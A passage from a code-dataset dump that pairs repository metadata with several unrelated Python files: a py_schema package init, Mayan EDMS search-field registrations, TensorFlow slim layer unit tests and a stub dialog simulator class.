] | 4 | 2019-07-28T19:35:07.000Z | 2021-06-02T00:15:57.000Z | py_schema/__init__.py | benhurott/py_schema | a0beab16bd91760942dc88942a65b480ec980ad8 | [
"MIT"
] | null | null | null | from .py_schema import * | 24 | 24 | 0.791667 | 4 | 24 | 4.5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.125 | 24 | 1 | 24 | 24 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
13c0b61b1530188fe35d913af504a7629298f5c3 | 1,012 | py | Python | mayan/apps/file_metadata/search.py | nattangwiwat/Mayan-EDMS-recitation | fcf16afb56eae812fb99144d65ae1ae6749de0b7 | [
"Apache-2.0"
] | 343 | 2015-01-05T14:19:35.000Z | 2018-12-10T19:07:48.000Z | mayan/apps/file_metadata/search.py | nattangwiwat/Mayan-EDMS-recitation | fcf16afb56eae812fb99144d65ae1ae6749de0b7 | [
"Apache-2.0"
] | 191 | 2015-01-03T00:48:19.000Z | 2018-11-30T09:10:25.000Z | mayan/apps/file_metadata/search.py | nattangwiwat/Mayan-EDMS-recitation | fcf16afb56eae812fb99144d65ae1ae6749de0b7 | [
"Apache-2.0"
] | 257 | 2019-05-14T10:26:37.000Z | 2022-03-30T03:37:36.000Z | from django.utils.translation import ugettext_lazy as _
from mayan.apps.documents.search import (
document_file_search, document_file_page_search, document_search
)
# Document
document_search.add_model_field(
field='files__file_metadata_drivers__entries__key',
label=_('File metadata key')
)
document_search.add_model_field(
field='files__file_metadata_drivers__entries__value',
label=_('File metadata value')
)
# Document file
document_file_search.add_model_field(
field='file_metadata_drivers__entries__key',
label=_('File metadata key')
)
document_file_search.add_model_field(
field='file_metadata_drivers__entries__value',
label=_('File metadata value')
)
# Document file page
document_file_page_search.add_model_field(
field='document_file__file_metadata_drivers__entries__key',
label=_('File metadata key')
)
document_file_page_search.add_model_field(
field='document_file__file_metadata_drivers__entries__value',
label=_('File metadata value')
)
| 25.948718 | 68 | 0.800395 | 131 | 1,012 | 5.541985 | 0.19084 | 0.198347 | 0.115702 | 0.157025 | 0.798898 | 0.798898 | 0.798898 | 0.798898 | 0.798898 | 0.761708 | 0 | 0 | 0.116601 | 1,012 | 38 | 69 | 26.631579 | 0.812081 | 0.040514 | 0 | 0.428571 | 0 | 0 | 0.380558 | 0.268873 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.071429 | 0 | 0.071429 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
13dc5d9aacf6e283540a406d419a67d2d7215161 | 29,242 | py | Python | research/inception/inception/slim/ops_test.py | 873040/Abhishek | 2ddd716e66bc5cc6e6f0787508dd07da0e02e75a | [
"Apache-2.0"
] | 3,326 | 2018-01-26T22:42:25.000Z | 2022-02-16T13:16:39.000Z | research/inception/inception/slim/ops_test.py | 873040/Abhishek | 2ddd716e66bc5cc6e6f0787508dd07da0e02e75a | [
"Apache-2.0"
] | 150 | 2017-08-28T14:59:36.000Z | 2022-03-11T23:21:35.000Z | research/inception/inception/slim/ops_test.py | 873040/Abhishek | 2ddd716e66bc5cc6e6f0787508dd07da0e02e75a | [
"Apache-2.0"
] | 1,474 | 2018-02-01T04:33:18.000Z | 2022-03-08T07:02:20.000Z | # Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for slim.ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import tensorflow as tf
from inception.slim import ops
from inception.slim import scopes
from inception.slim import variables
class ConvTest(tf.test.TestCase):
def testCreateConv(self):
height, width = 3, 3
with self.test_session():
images = tf.random_uniform((5, height, width, 3), seed=1)
output = ops.conv2d(images, 32, [3, 3])
self.assertEquals(output.op.name, 'Conv/Relu')
self.assertListEqual(output.get_shape().as_list(), [5, height, width, 32])
def testCreateSquareConv(self):
height, width = 3, 3
with self.test_session():
images = tf.random_uniform((5, height, width, 3), seed=1)
output = ops.conv2d(images, 32, 3)
self.assertEquals(output.op.name, 'Conv/Relu')
self.assertListEqual(output.get_shape().as_list(), [5, height, width, 32])
def testCreateConvWithTensorShape(self):
height, width = 3, 3
with self.test_session():
images = tf.random_uniform((5, height, width, 3), seed=1)
output = ops.conv2d(images, 32, images.get_shape()[1:3])
self.assertEquals(output.op.name, 'Conv/Relu')
self.assertListEqual(output.get_shape().as_list(), [5, height, width, 32])
def testCreateFullyConv(self):
height, width = 6, 6
with self.test_session():
images = tf.random_uniform((5, height, width, 32), seed=1)
output = ops.conv2d(images, 64, images.get_shape()[1:3], padding='VALID')
self.assertEquals(output.op.name, 'Conv/Relu')
self.assertListEqual(output.get_shape().as_list(), [5, 1, 1, 64])
def testCreateVerticalConv(self):
height, width = 3, 3
with self.test_session():
images = tf.random_uniform((5, height, width, 3), seed=1)
output = ops.conv2d(images, 32, [3, 1])
self.assertEquals(output.op.name, 'Conv/Relu')
self.assertListEqual(output.get_shape().as_list(),
[5, height, width, 32])
def testCreateHorizontalConv(self):
height, width = 3, 3
with self.test_session():
images = tf.random_uniform((5, height, width, 3), seed=1)
output = ops.conv2d(images, 32, [1, 3])
self.assertEquals(output.op.name, 'Conv/Relu')
self.assertListEqual(output.get_shape().as_list(),
[5, height, width, 32])
def testCreateConvWithStride(self):
height, width = 6, 6
with self.test_session():
images = tf.random_uniform((5, height, width, 3), seed=1)
output = ops.conv2d(images, 32, [3, 3], stride=2)
self.assertEquals(output.op.name, 'Conv/Relu')
self.assertListEqual(output.get_shape().as_list(),
[5, height/2, width/2, 32])
def testCreateConvCreatesWeightsAndBiasesVars(self):
height, width = 3, 3
images = tf.random_uniform((5, height, width, 3), seed=1)
with self.test_session():
self.assertFalse(variables.get_variables('conv1/weights'))
self.assertFalse(variables.get_variables('conv1/biases'))
ops.conv2d(images, 32, [3, 3], scope='conv1')
self.assertTrue(variables.get_variables('conv1/weights'))
self.assertTrue(variables.get_variables('conv1/biases'))
def testCreateConvWithScope(self):
height, width = 3, 3
with self.test_session():
images = tf.random_uniform((5, height, width, 3), seed=1)
output = ops.conv2d(images, 32, [3, 3], scope='conv1')
self.assertEquals(output.op.name, 'conv1/Relu')
def testCreateConvWithoutActivation(self):
height, width = 3, 3
with self.test_session():
images = tf.random_uniform((5, height, width, 3), seed=1)
output = ops.conv2d(images, 32, [3, 3], activation=None)
self.assertEquals(output.op.name, 'Conv/BiasAdd')
def testCreateConvValid(self):
height, width = 3, 3
with self.test_session():
images = tf.random_uniform((5, height, width, 3), seed=1)
output = ops.conv2d(images, 32, [3, 3], padding='VALID')
self.assertListEqual(output.get_shape().as_list(), [5, 1, 1, 32])
def testCreateConvWithWD(self):
height, width = 3, 3
with self.test_session() as sess:
images = tf.random_uniform((5, height, width, 3), seed=1)
ops.conv2d(images, 32, [3, 3], weight_decay=0.01)
wd = tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES)[0]
self.assertEquals(wd.op.name,
'Conv/weights/Regularizer/L2Regularizer/value')
sess.run(tf.global_variables_initializer())
self.assertTrue(sess.run(wd) <= 0.01)
def testCreateConvWithoutWD(self):
height, width = 3, 3
with self.test_session():
images = tf.random_uniform((5, height, width, 3), seed=1)
ops.conv2d(images, 32, [3, 3], weight_decay=0)
self.assertEquals(
tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES), [])
def testReuseVars(self):
height, width = 3, 3
with self.test_session():
images = tf.random_uniform((5, height, width, 3), seed=1)
ops.conv2d(images, 32, [3, 3], scope='conv1')
self.assertEquals(len(variables.get_variables()), 2)
ops.conv2d(images, 32, [3, 3], scope='conv1', reuse=True)
self.assertEquals(len(variables.get_variables()), 2)
def testNonReuseVars(self):
height, width = 3, 3
with self.test_session():
images = tf.random_uniform((5, height, width, 3), seed=1)
ops.conv2d(images, 32, [3, 3])
self.assertEquals(len(variables.get_variables()), 2)
ops.conv2d(images, 32, [3, 3])
self.assertEquals(len(variables.get_variables()), 4)
def testReuseConvWithWD(self):
height, width = 3, 3
with self.test_session():
images = tf.random_uniform((5, height, width, 3), seed=1)
ops.conv2d(images, 32, [3, 3], weight_decay=0.01, scope='conv1')
self.assertEquals(len(variables.get_variables()), 2)
self.assertEquals(
len(tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES)), 1)
ops.conv2d(images, 32, [3, 3], weight_decay=0.01, scope='conv1',
reuse=True)
self.assertEquals(len(variables.get_variables()), 2)
self.assertEquals(
len(tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES)), 1)
def testConvWithBatchNorm(self):
height, width = 3, 3
with self.test_session():
images = tf.random_uniform((5, height, width, 32), seed=1)
with scopes.arg_scope([ops.conv2d], batch_norm_params={'decay': 0.9}):
net = ops.conv2d(images, 32, [3, 3])
net = ops.conv2d(net, 32, [3, 3])
self.assertEquals(len(variables.get_variables()), 8)
self.assertEquals(len(variables.get_variables('Conv/BatchNorm')), 3)
self.assertEquals(len(variables.get_variables('Conv_1/BatchNorm')), 3)
def testReuseConvWithBatchNorm(self):
height, width = 3, 3
with self.test_session():
images = tf.random_uniform((5, height, width, 32), seed=1)
with scopes.arg_scope([ops.conv2d], batch_norm_params={'decay': 0.9}):
net = ops.conv2d(images, 32, [3, 3], scope='Conv')
net = ops.conv2d(net, 32, [3, 3], scope='Conv', reuse=True)
self.assertEquals(len(variables.get_variables()), 4)
self.assertEquals(len(variables.get_variables('Conv/BatchNorm')), 3)
self.assertEquals(len(variables.get_variables('Conv_1/BatchNorm')), 0)
class FCTest(tf.test.TestCase):
def testCreateFC(self):
height, width = 3, 3
with self.test_session():
inputs = tf.random_uniform((5, height * width * 3), seed=1)
output = ops.fc(inputs, 32)
self.assertEquals(output.op.name, 'FC/Relu')
self.assertListEqual(output.get_shape().as_list(), [5, 32])
def testCreateFCWithScope(self):
height, width = 3, 3
with self.test_session():
inputs = tf.random_uniform((5, height * width * 3), seed=1)
output = ops.fc(inputs, 32, scope='fc1')
self.assertEquals(output.op.name, 'fc1/Relu')
def testCreateFcCreatesWeightsAndBiasesVars(self):
height, width = 3, 3
inputs = tf.random_uniform((5, height * width * 3), seed=1)
with self.test_session():
self.assertFalse(variables.get_variables('fc1/weights'))
self.assertFalse(variables.get_variables('fc1/biases'))
ops.fc(inputs, 32, scope='fc1')
self.assertTrue(variables.get_variables('fc1/weights'))
self.assertTrue(variables.get_variables('fc1/biases'))
def testReuseVars(self):
height, width = 3, 3
inputs = tf.random_uniform((5, height * width * 3), seed=1)
with self.test_session():
ops.fc(inputs, 32, scope='fc1')
self.assertEquals(len(variables.get_variables('fc1')), 2)
ops.fc(inputs, 32, scope='fc1', reuse=True)
self.assertEquals(len(variables.get_variables('fc1')), 2)
def testNonReuseVars(self):
height, width = 3, 3
inputs = tf.random_uniform((5, height * width * 3), seed=1)
with self.test_session():
ops.fc(inputs, 32)
self.assertEquals(len(variables.get_variables('FC')), 2)
ops.fc(inputs, 32)
self.assertEquals(len(variables.get_variables('FC')), 4)
def testCreateFCWithoutActivation(self):
height, width = 3, 3
with self.test_session():
inputs = tf.random_uniform((5, height * width * 3), seed=1)
output = ops.fc(inputs, 32, activation=None)
self.assertEquals(output.op.name, 'FC/xw_plus_b')
def testCreateFCWithWD(self):
height, width = 3, 3
with self.test_session() as sess:
inputs = tf.random_uniform((5, height * width * 3), seed=1)
ops.fc(inputs, 32, weight_decay=0.01)
wd = tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES)[0]
self.assertEquals(wd.op.name,
'FC/weights/Regularizer/L2Regularizer/value')
sess.run(tf.global_variables_initializer())
self.assertTrue(sess.run(wd) <= 0.01)
def testCreateFCWithoutWD(self):
height, width = 3, 3
with self.test_session():
inputs = tf.random_uniform((5, height * width * 3), seed=1)
ops.fc(inputs, 32, weight_decay=0)
self.assertEquals(
tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES), [])
def testReuseFCWithWD(self):
height, width = 3, 3
with self.test_session():
inputs = tf.random_uniform((5, height * width * 3), seed=1)
ops.fc(inputs, 32, weight_decay=0.01, scope='fc')
self.assertEquals(len(variables.get_variables()), 2)
self.assertEquals(
len(tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES)), 1)
ops.fc(inputs, 32, weight_decay=0.01, scope='fc', reuse=True)
self.assertEquals(len(variables.get_variables()), 2)
self.assertEquals(
len(tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES)), 1)
def testFCWithBatchNorm(self):
height, width = 3, 3
with self.test_session():
images = tf.random_uniform((5, height * width * 3), seed=1)
with scopes.arg_scope([ops.fc], batch_norm_params={}):
net = ops.fc(images, 27)
net = ops.fc(net, 27)
self.assertEquals(len(variables.get_variables()), 8)
self.assertEquals(len(variables.get_variables('FC/BatchNorm')), 3)
self.assertEquals(len(variables.get_variables('FC_1/BatchNorm')), 3)
def testReuseFCWithBatchNorm(self):
height, width = 3, 3
with self.test_session():
images = tf.random_uniform((5, height * width * 3), seed=1)
with scopes.arg_scope([ops.fc], batch_norm_params={'decay': 0.9}):
net = ops.fc(images, 27, scope='fc1')
net = ops.fc(net, 27, scope='fc1', reuse=True)
self.assertEquals(len(variables.get_variables()), 4)
self.assertEquals(len(variables.get_variables('fc1/BatchNorm')), 3)
class MaxPoolTest(tf.test.TestCase):
def testCreateMaxPool(self):
height, width = 3, 3
with self.test_session():
images = tf.random_uniform((5, height, width, 3), seed=1)
output = ops.max_pool(images, [3, 3])
self.assertEquals(output.op.name, 'MaxPool/MaxPool')
self.assertListEqual(output.get_shape().as_list(), [5, 1, 1, 3])
def testCreateSquareMaxPool(self):
height, width = 3, 3
with self.test_session():
images = tf.random_uniform((5, height, width, 3), seed=1)
output = ops.max_pool(images, 3)
self.assertEquals(output.op.name, 'MaxPool/MaxPool')
self.assertListEqual(output.get_shape().as_list(), [5, 1, 1, 3])
def testCreateMaxPoolWithScope(self):
height, width = 3, 3
with self.test_session():
images = tf.random_uniform((5, height, width, 3), seed=1)
output = ops.max_pool(images, [3, 3], scope='pool1')
self.assertEquals(output.op.name, 'pool1/MaxPool')
def testCreateMaxPoolSAME(self):
height, width = 3, 3
with self.test_session():
images = tf.random_uniform((5, height, width, 3), seed=1)
output = ops.max_pool(images, [3, 3], padding='SAME')
self.assertListEqual(output.get_shape().as_list(), [5, 2, 2, 3])
def testCreateMaxPoolStrideSAME(self):
height, width = 3, 3
with self.test_session():
images = tf.random_uniform((5, height, width, 3), seed=1)
output = ops.max_pool(images, [3, 3], stride=1, padding='SAME')
self.assertListEqual(output.get_shape().as_list(), [5, height, width, 3])
def testGlobalMaxPool(self):
height, width = 3, 3
with self.test_session():
images = tf.random_uniform((5, height, width, 3), seed=1)
output = ops.max_pool(images, images.get_shape()[1:3], stride=1)
self.assertListEqual(output.get_shape().as_list(), [5, 1, 1, 3])
class AvgPoolTest(tf.test.TestCase):
def testCreateAvgPool(self):
height, width = 3, 3
with self.test_session():
images = tf.random_uniform((5, height, width, 3), seed=1)
output = ops.avg_pool(images, [3, 3])
self.assertEquals(output.op.name, 'AvgPool/AvgPool')
self.assertListEqual(output.get_shape().as_list(), [5, 1, 1, 3])
def testCreateSquareAvgPool(self):
height, width = 3, 3
with self.test_session():
images = tf.random_uniform((5, height, width, 3), seed=1)
output = ops.avg_pool(images, 3)
self.assertEquals(output.op.name, 'AvgPool/AvgPool')
self.assertListEqual(output.get_shape().as_list(), [5, 1, 1, 3])
def testCreateAvgPoolWithScope(self):
height, width = 3, 3
with self.test_session():
images = tf.random_uniform((5, height, width, 3), seed=1)
output = ops.avg_pool(images, [3, 3], scope='pool1')
self.assertEquals(output.op.name, 'pool1/AvgPool')
def testCreateAvgPoolSAME(self):
height, width = 3, 3
with self.test_session():
images = tf.random_uniform((5, height, width, 3), seed=1)
output = ops.avg_pool(images, [3, 3], padding='SAME')
self.assertListEqual(output.get_shape().as_list(), [5, 2, 2, 3])
def testCreateAvgPoolStrideSAME(self):
height, width = 3, 3
with self.test_session():
images = tf.random_uniform((5, height, width, 3), seed=1)
output = ops.avg_pool(images, [3, 3], stride=1, padding='SAME')
self.assertListEqual(output.get_shape().as_list(), [5, height, width, 3])
def testGlobalAvgPool(self):
height, width = 3, 3
with self.test_session():
images = tf.random_uniform((5, height, width, 3), seed=1)
output = ops.avg_pool(images, images.get_shape()[1:3], stride=1)
self.assertListEqual(output.get_shape().as_list(), [5, 1, 1, 3])
class OneHotEncodingTest(tf.test.TestCase):
def testOneHotEncodingCreate(self):
with self.test_session():
labels = tf.constant([0, 1, 2])
output = ops.one_hot_encoding(labels, num_classes=3)
self.assertEquals(output.op.name, 'OneHotEncoding/SparseToDense')
self.assertListEqual(output.get_shape().as_list(), [3, 3])
def testOneHotEncoding(self):
with self.test_session():
labels = tf.constant([0, 1, 2])
one_hot_labels = tf.constant([[1, 0, 0],
[0, 1, 0],
[0, 0, 1]])
output = ops.one_hot_encoding(labels, num_classes=3)
self.assertAllClose(output.eval(), one_hot_labels.eval())
class DropoutTest(tf.test.TestCase):
def testCreateDropout(self):
height, width = 3, 3
with self.test_session():
images = tf.random_uniform((5, height, width, 3), seed=1)
output = ops.dropout(images)
self.assertEquals(output.op.name, 'Dropout/dropout/mul')
output.get_shape().assert_is_compatible_with(images.get_shape())
def testCreateDropoutNoTraining(self):
height, width = 3, 3
with self.test_session():
images = tf.random_uniform((5, height, width, 3), seed=1, name='images')
output = ops.dropout(images, is_training=False)
self.assertEquals(output, images)
class FlattenTest(tf.test.TestCase):
def testFlatten4D(self):
height, width = 3, 3
with self.test_session():
images = tf.random_uniform((5, height, width, 3), seed=1, name='images')
output = ops.flatten(images)
self.assertEquals(output.get_shape().num_elements(),
images.get_shape().num_elements())
self.assertEqual(output.get_shape()[0], images.get_shape()[0])
def testFlatten3D(self):
height, width = 3, 3
with self.test_session():
images = tf.random_uniform((5, height, width), seed=1, name='images')
output = ops.flatten(images)
self.assertEquals(output.get_shape().num_elements(),
images.get_shape().num_elements())
self.assertEqual(output.get_shape()[0], images.get_shape()[0])
def testFlattenBatchSize(self):
height, width = 3, 3
with self.test_session() as sess:
images = tf.random_uniform((5, height, width, 3), seed=1, name='images')
inputs = tf.placeholder(tf.int32, (None, height, width, 3))
output = ops.flatten(inputs)
self.assertEquals(output.get_shape().as_list(),
[None, height * width * 3])
output = sess.run(output, {inputs: images.eval()})
self.assertEquals(output.size,
images.get_shape().num_elements())
self.assertEqual(output.shape[0], images.get_shape()[0])
class BatchNormTest(tf.test.TestCase):
def testCreateOp(self):
height, width = 3, 3
with self.test_session():
images = tf.random_uniform((5, height, width, 3), seed=1)
output = ops.batch_norm(images)
self.assertTrue(output.op.name.startswith('BatchNorm/batchnorm'))
self.assertListEqual(output.get_shape().as_list(), [5, height, width, 3])
def testCreateVariables(self):
height, width = 3, 3
with self.test_session():
images = tf.random_uniform((5, height, width, 3), seed=1)
ops.batch_norm(images)
beta = variables.get_variables_by_name('beta')[0]
self.assertEquals(beta.op.name, 'BatchNorm/beta')
gamma = variables.get_variables_by_name('gamma')
self.assertEquals(gamma, [])
moving_mean = tf.moving_average_variables()[0]
moving_variance = tf.moving_average_variables()[1]
self.assertEquals(moving_mean.op.name, 'BatchNorm/moving_mean')
self.assertEquals(moving_variance.op.name, 'BatchNorm/moving_variance')
def testCreateVariablesWithScale(self):
height, width = 3, 3
with self.test_session():
images = tf.random_uniform((5, height, width, 3), seed=1)
ops.batch_norm(images, scale=True)
beta = variables.get_variables_by_name('beta')[0]
gamma = variables.get_variables_by_name('gamma')[0]
self.assertEquals(beta.op.name, 'BatchNorm/beta')
self.assertEquals(gamma.op.name, 'BatchNorm/gamma')
moving_mean = tf.moving_average_variables()[0]
moving_variance = tf.moving_average_variables()[1]
self.assertEquals(moving_mean.op.name, 'BatchNorm/moving_mean')
self.assertEquals(moving_variance.op.name, 'BatchNorm/moving_variance')
def testCreateVariablesWithoutCenterWithScale(self):
height, width = 3, 3
with self.test_session():
images = tf.random_uniform((5, height, width, 3), seed=1)
ops.batch_norm(images, center=False, scale=True)
beta = variables.get_variables_by_name('beta')
self.assertEquals(beta, [])
gamma = variables.get_variables_by_name('gamma')[0]
self.assertEquals(gamma.op.name, 'BatchNorm/gamma')
moving_mean = tf.moving_average_variables()[0]
moving_variance = tf.moving_average_variables()[1]
self.assertEquals(moving_mean.op.name, 'BatchNorm/moving_mean')
self.assertEquals(moving_variance.op.name, 'BatchNorm/moving_variance')
def testCreateVariablesWithoutCenterWithoutScale(self):
height, width = 3, 3
with self.test_session():
images = tf.random_uniform((5, height, width, 3), seed=1)
ops.batch_norm(images, center=False, scale=False)
beta = variables.get_variables_by_name('beta')
self.assertEquals(beta, [])
gamma = variables.get_variables_by_name('gamma')
self.assertEquals(gamma, [])
moving_mean = tf.moving_average_variables()[0]
moving_variance = tf.moving_average_variables()[1]
self.assertEquals(moving_mean.op.name, 'BatchNorm/moving_mean')
self.assertEquals(moving_variance.op.name, 'BatchNorm/moving_variance')
def testMovingAverageVariables(self):
height, width = 3, 3
with self.test_session():
images = tf.random_uniform((5, height, width, 3), seed=1)
ops.batch_norm(images, scale=True)
moving_mean = tf.moving_average_variables()[0]
moving_variance = tf.moving_average_variables()[1]
self.assertEquals(moving_mean.op.name, 'BatchNorm/moving_mean')
self.assertEquals(moving_variance.op.name, 'BatchNorm/moving_variance')
def testUpdateOps(self):
height, width = 3, 3
with self.test_session():
images = tf.random_uniform((5, height, width, 3), seed=1)
ops.batch_norm(images)
update_ops = tf.get_collection(ops.UPDATE_OPS_COLLECTION)
update_moving_mean = update_ops[0]
update_moving_variance = update_ops[1]
self.assertEquals(update_moving_mean.op.name,
'BatchNorm/AssignMovingAvg')
self.assertEquals(update_moving_variance.op.name,
'BatchNorm/AssignMovingAvg_1')
def testReuseVariables(self):
height, width = 3, 3
with self.test_session():
images = tf.random_uniform((5, height, width, 3), seed=1)
ops.batch_norm(images, scale=True, scope='bn')
ops.batch_norm(images, scale=True, scope='bn', reuse=True)
beta = variables.get_variables_by_name('beta')
gamma = variables.get_variables_by_name('gamma')
self.assertEquals(len(beta), 1)
self.assertEquals(len(gamma), 1)
moving_vars = tf.get_collection('moving_vars')
self.assertEquals(len(moving_vars), 2)
def testReuseUpdateOps(self):
height, width = 3, 3
with self.test_session():
images = tf.random_uniform((5, height, width, 3), seed=1)
ops.batch_norm(images, scope='bn')
self.assertEquals(len(tf.get_collection(ops.UPDATE_OPS_COLLECTION)), 2)
ops.batch_norm(images, scope='bn', reuse=True)
self.assertEquals(len(tf.get_collection(ops.UPDATE_OPS_COLLECTION)), 4)
def testCreateMovingVars(self):
height, width = 3, 3
with self.test_session():
images = tf.random_uniform((5, height, width, 3), seed=1)
_ = ops.batch_norm(images, moving_vars='moving_vars')
moving_mean = tf.get_collection('moving_vars',
'BatchNorm/moving_mean')
self.assertEquals(len(moving_mean), 1)
self.assertEquals(moving_mean[0].op.name, 'BatchNorm/moving_mean')
moving_variance = tf.get_collection('moving_vars',
'BatchNorm/moving_variance')
self.assertEquals(len(moving_variance), 1)
self.assertEquals(moving_variance[0].op.name, 'BatchNorm/moving_variance')
def testComputeMovingVars(self):
height, width = 3, 3
with self.test_session() as sess:
image_shape = (10, height, width, 3)
image_values = np.random.rand(*image_shape)
expected_mean = np.mean(image_values, axis=(0, 1, 2))
expected_var = np.var(image_values, axis=(0, 1, 2))
images = tf.constant(image_values, shape=image_shape, dtype=tf.float32)
output = ops.batch_norm(images, decay=0.1)
update_ops = tf.get_collection(ops.UPDATE_OPS_COLLECTION)
with tf.control_dependencies(update_ops):
output = tf.identity(output)
# Initialize all variables
sess.run(tf.global_variables_initializer())
moving_mean = variables.get_variables('BatchNorm/moving_mean')[0]
moving_variance = variables.get_variables('BatchNorm/moving_variance')[0]
mean, variance = sess.run([moving_mean, moving_variance])
# After initialization moving_mean == 0 and moving_variance == 1.
self.assertAllClose(mean, [0] * 3)
self.assertAllClose(variance, [1] * 3)
for _ in range(10):
sess.run([output])
mean = moving_mean.eval()
variance = moving_variance.eval()
# After 10 updates with decay 0.1 moving_mean == expected_mean and
# moving_variance == expected_var.
self.assertAllClose(mean, expected_mean)
self.assertAllClose(variance, expected_var)
def testEvalMovingVars(self):
height, width = 3, 3
with self.test_session() as sess:
image_shape = (10, height, width, 3)
image_values = np.random.rand(*image_shape)
expected_mean = np.mean(image_values, axis=(0, 1, 2))
expected_var = np.var(image_values, axis=(0, 1, 2))
images = tf.constant(image_values, shape=image_shape, dtype=tf.float32)
output = ops.batch_norm(images, decay=0.1, is_training=False)
update_ops = tf.get_collection(ops.UPDATE_OPS_COLLECTION)
with tf.control_dependencies(update_ops):
output = tf.identity(output)
# Initialize all variables
sess.run(tf.global_variables_initializer())
moving_mean = variables.get_variables('BatchNorm/moving_mean')[0]
moving_variance = variables.get_variables('BatchNorm/moving_variance')[0]
mean, variance = sess.run([moving_mean, moving_variance])
# After initialization moving_mean == 0 and moving_variance == 1.
self.assertAllClose(mean, [0] * 3)
self.assertAllClose(variance, [1] * 3)
# Simulate assigment from saver restore.
init_assigns = [tf.assign(moving_mean, expected_mean),
tf.assign(moving_variance, expected_var)]
sess.run(init_assigns)
for _ in range(10):
sess.run([output], {images: np.random.rand(*image_shape)})
mean = moving_mean.eval()
variance = moving_variance.eval()
# Although we feed different images, the moving_mean and moving_variance
# shouldn't change.
self.assertAllClose(mean, expected_mean)
self.assertAllClose(variance, expected_var)
def testReuseVars(self):
height, width = 3, 3
with self.test_session() as sess:
image_shape = (10, height, width, 3)
image_values = np.random.rand(*image_shape)
expected_mean = np.mean(image_values, axis=(0, 1, 2))
expected_var = np.var(image_values, axis=(0, 1, 2))
images = tf.constant(image_values, shape=image_shape, dtype=tf.float32)
output = ops.batch_norm(images, decay=0.1, is_training=False)
update_ops = tf.get_collection(ops.UPDATE_OPS_COLLECTION)
with tf.control_dependencies(update_ops):
output = tf.identity(output)
# Initialize all variables
sess.run(tf.global_variables_initializer())
moving_mean = variables.get_variables('BatchNorm/moving_mean')[0]
moving_variance = variables.get_variables('BatchNorm/moving_variance')[0]
mean, variance = sess.run([moving_mean, moving_variance])
# After initialization moving_mean == 0 and moving_variance == 1.
self.assertAllClose(mean, [0] * 3)
self.assertAllClose(variance, [1] * 3)
# Simulate assigment from saver restore.
init_assigns = [tf.assign(moving_mean, expected_mean),
tf.assign(moving_variance, expected_var)]
sess.run(init_assigns)
for _ in range(10):
sess.run([output], {images: np.random.rand(*image_shape)})
mean = moving_mean.eval()
variance = moving_variance.eval()
# Although we feed different images, the moving_mean and moving_variance
# shouldn't change.
self.assertAllClose(mean, expected_mean)
self.assertAllClose(variance, expected_var)
if __name__ == '__main__':
tf.test.main()
| 42.502907 | 80 | 0.665139 | 3,859 | 29,242 | 4.894273 | 0.07774 | 0.074549 | 0.074337 | 0.061365 | 0.831313 | 0.807222 | 0.783767 | 0.767036 | 0.743633 | 0.734844 | 0 | 0.03255 | 0.194173 | 29,242 | 687 | 81 | 42.564774 | 0.76897 | 0.043978 | 0 | 0.656846 | 0 | 0 | 0.048741 | 0.022419 | 0 | 0 | 0 | 0 | 0.232236 | 1 | 0.105719 | false | 0 | 0.013865 | 0 | 0.133449 | 0.001733 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
13e6529482cf39e6f986f2fa2c33918778412b41 | 387 | py | Python | game/simulator/simulator.py | laddie132/MD3 | 3df45918e33437e9a2309f7965f34f3a75621059 | [
"MIT"
] | 6 | 2021-02-07T03:20:29.000Z | 2021-04-09T03:34:51.000Z | game/simulator/simulator.py | laddie132/MD3 | 3df45918e33437e9a2309f7965f34f3a75621059 | [
"MIT"
] | null | null | null | game/simulator/simulator.py | laddie132/MD3 | 3df45918e33437e9a2309f7965f34f3a75621059 | [
"MIT"
] | 1 | 2021-12-14T15:42:40.000Z | 2021-12-14T15:42:40.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = "Han"
__email__ = "liuhan132@foxmail.com"
class Simulator:
def __init__(self):
pass
def init_dialog(self, *args):
return NotImplementedError
def respond_act(self, agent_act, agent_value):
return NotImplementedError
def respond_nl(self, agent_nl):
return NotImplementedError
